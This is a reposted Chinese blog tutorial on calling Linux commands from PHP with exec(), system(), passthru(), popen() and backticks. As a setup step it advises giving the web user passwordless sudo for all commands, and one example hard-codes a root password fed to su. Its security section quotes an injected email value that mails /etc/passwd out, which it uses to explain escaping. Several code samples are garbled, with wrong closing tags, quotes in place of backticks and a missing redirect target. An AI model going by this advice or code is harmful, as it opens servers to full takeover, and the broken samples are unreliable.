PHP的exec()函数⽤法详解
本⽂转载⾃:blog.csdn/shaobingj126/article/details/7029407
先⼩说两句:今天研究了下PHP调⽤LINUX命令的功能,⼀开始怎么做都调⽤不成功,试了好久才终于成功了,所以发出来分享⼀下。下⾯我将详细介绍:
PHP中提供了⼏个调⽤linux命令的函数,exec、system、passthru,函数使⽤请参考⼿册,这⾥不具体介绍。下⾯我以exec函数为例具体介绍:⽐如LINUX中修改服务器时间命令是 /bin/date -s '2010-05-28 13:10',我们通过php函数exec调⽤这个命令执⾏修改时间exec("sudo /bin/date -s '2010-05-28 13:10'",$out,$status);其中$out是输出值,$status是返回值0或1,如果返回0则执⾏成功,返回1则执⾏失败。要通过PHP成功执⾏这个命令(PHP运⾏⽤户⾮root)需要检查以下⼏点:
1、⾸先查看php运⾏⽤户,可以在web服务器配置⽂件中查看,或者运⾏
<?php echo shell_exec("id -a");?>
直接查看。⽐如我的运⾏⽤户是www,编辑/etc/sudoers⽂件
vi /etc/sudoers
⾸先加上www⽤户  www ALL=(ALL)  NOPASSWD:ALL
这表⽰www⽤户运⾏的时候不⽤输⼊密码。接着看图⽚注释掉前⾯两个,删除圈着的环境变量LS_COLORS,其中Ubuntu中是没有这⼏个的,这⼀步可省略,其他Redhat、Fedora、Centos这⼏个都是需要这么做的。
2、查看php.ini中配置是否打开安全模式,主要是以下三个地⽅
safe_mode =  (这个如果为off下⾯两个就不⽤管了)
disable_functions =
safe_mode_exec_dir=
OVER,下⾯你就可以⽤exec调⽤linux命令执⾏了。
PHP 执⾏系统外部命令 system() exec() passthru()
PHP作为⼀种服务器端的脚本语⾔,象编写简单,或者是复杂的动态⽹页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。
区别:
system() 输出并返回最后⼀⾏shell结果。
exec() 不输出结果,返回最后⼀⾏shell结果,所有结果可以保存到⼀个返回的数组⾥⾯。
passthru() 只调⽤命令,把命令的运⾏结果原样地直接输出到标准输出设备上。
相同点:都可以获得命令执⾏的状态码
demo:
复制代码代码如下:
//system('dir');
// exec ('dir');
// passthru ('dir');
// echo `dir`;
PHP作为⼀种服务器端的脚本语⾔,象编写简单,或者是复杂的动态⽹页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。
重定向过多是什么意思那么,是否可以在PHP脚本中调⽤外部命令呢?如果能,如何去做呢?有些什么⽅⾯的顾虑呢?相信你看了本⽂后,肯定能够回答这些问题了。
是否可以?
答案是肯定的。PHP和其它的程序设计语⾔⼀样,完全可以在程序内调⽤外部命令,并且是很简单的:只要⽤⼀个或⼏个函数即可。
前提条件
由于PHP基本是⽤于WEB程序开发的,所以安全性成了⼈们考虑的⼀个重要⽅⾯。于是PHP的设计者们给PHP加了⼀个门:安全模式。如果运⾏在安全模式下,那么PHP脚本中将受到如下四个⽅⾯的限制:
执⾏外部命令
在打开⽂件时有些限制
连接MySQL数据库
基于HTTP的认证
在安全模式下,只有在特定⽬录中的外部程序才可以被执⾏,对其它程序的调⽤将被拒绝。这个⽬录可以在php.ini⽂件中⽤ safe_mode_exec_dir指令,或在
编译PHP是加上--with-exec-dir选项来指定,默认是 /usr/local/php/bin。
如果你调⽤⼀个应该可以输出结果的外部命令(意思是PHP脚本没有错误),得到的却是⼀⽚空⽩,那么很可能你的⽹管已经把PHP运⾏在安全模式下了。
如何做?
在PHP中调⽤外部命令,可以⽤如下三种⽅法来实现:
1)⽤PHP提供的专门函数
PHP提供共了3个专门的执⾏外部命令的函数:system(),exec(),passthru()。
system()
原型:string system (string command [, int return_var])
system()函数很其它语⾔中的差不多,它执⾏给定的命令,输出和返回结果。第⼆个参数是可选的,⽤来得到命令执⾏后的状态码。
例⼦:
复制代码代码如下:
<?php
system("/usr/local/bin/webalizer/webalizer");
>
exec()
原型:string exec (string command [, string array [, int return_var]])
exec ()函数与system()类似,也执⾏给定的命令,但不输出结果,⽽是返回结果的最后⼀⾏。虽然它只返回命令结果的最后⼀⾏,但⽤第⼆个参数array 可以得到完整的结果,⽅法是把结果逐⾏追加到array的结尾处。所以如果array不是空的,在调⽤之前最好⽤unset()最它清掉。只有指定了第⼆个参数时,才可以⽤第三个参数,⽤来取得命令执⾏的状态码。
例⼦:
复制代码代码如下:
<?php
exec("/bin/ls -l");
exec("/bin/ls -l", $res);
exec("/bin/ls -l", $res, $rc);
>
passthru()
原型:void passthru (string command [, int return_var])
passthru ()只调⽤命令,不返回任何结果,但把命令的运⾏结果原样地直接输出到标准输出设备上。所以passthru()函数经常⽤来调⽤象pbmplus (Unix下的⼀个处理图⽚的⼯具,输出⼆进制的原始图⽚的流)这样的程序。同样它也可以得到命令执⾏的状态码。
例⼦:
复制代码代码如下:
<?php
header("Content-type: image/gif");
passthru("./ppmtogif hunte.ppm");
>
2)⽤popen()函数打开进程
上⾯的⽅法只能简单地执⾏命令,却不能与命令交互。但有些时候必须向命令输⼊⼀些东西,如在增加Linux的系统⽤户时,要调⽤su来把当前⽤户换到root才⾏,⽽su命令必须要在命令⾏上输⼊root的密码。这种情况下,⽤上⾯提到的⽅法显然是不⾏的。
popen ()函数打开⼀个进程管道来执⾏给定的命令,返回⼀个⽂件句柄。既然返回的是⼀个⽂件句柄,那么就可以对它读和写了。在PHP3中,对这种句柄只能做单⼀的操作模式,要么写,要么读;从PHP4开始,可以同时读和写了。除⾮这个句柄是以⼀种模式(读或写)打开的,否则必须调⽤pclose()函数来关闭它。
例⼦1:
复制代码代码如下:
<?php
$fp=popen("/bin/ls -l", "r");
>
例⼦2:
复制代码代码如下:
<?php
/* PHP中如何增加⼀个系统⽤户
下⾯是⼀段例程,增加⼀个名字为james的⽤户,
root密码是 verygood。仅供参考
*/
$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "verygood";
$user = "james";
$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w");
@fputs($fp,$rootpasswd);
@pclose($fp);
>
3)⽤反撇号(`,也就是键盘上ESC键下⾯的那个,和~在同⼀个上⾯)
这个⽅法以前没有归⼊PHP的⽂档,是作为⼀个秘技存在的。⽅法很简单,⽤两个反撇号把要执⾏的命令括起来作为⼀个表达式,这个表达式的值就是命令执⾏的结果。如:
复制代码代码如下:
<?php
$res='/bin/ls -l';
echo '
'.$res.'
';
>
这个脚本的输出就象:
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考虑些什么?
要考虑两个问题:安全性和超时。
先看安全性。⽐如,你有⼀家⼩型的⽹上商店,所以可以出售的产品列表放在⼀个⽂件中。你编写了⼀个有表单的HTML⽂件,让你的⽤户输⼊他们的EMAIL 地址,然后把这个产品列表发给他们。假设你没有使⽤PHP的mail()函数(或者从未听说过),你就调⽤Linux/Unix系统的mail程序来发送这个⽂件。程序就象这样:
复制代码代码如下:
<?php
system("mail $to < ");
echo "我们的产品⽬录已经发送到你的信箱:$to";
>
⽤这段代码,⼀般的⽤户不会产⽣什么危险,但实际上存在着⾮常⼤的安全漏洞。如果有个恶意的⽤户输⼊了这样⼀个EMAIL地址:
'--bla ; mail someone@domain < /etc/passwd ;'
那么这条命令最终变成:
'mail --bla ; mail someone@domain < /etc/passwd ; < '
我相信,⽆论哪个⽹络管理⼈员见到这样的命令,都会吓出⼀⾝冷汗来。
幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把⼀个字符串中所有可能瞒过Shell⽽去执⾏另外⼀个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从⽂件读⼊(<)等。函数EscapeShellArg是⽤来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。
再来看看超时问题。如果要执⾏的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运⾏。但在默认情况下,象system()等函数要等到这个命令运⾏完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外⼀个⽂件或流中,如:
复制代码代码如下:
<?php
system("/usr/local/bin/order_proc > /tmp/null &"); >

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。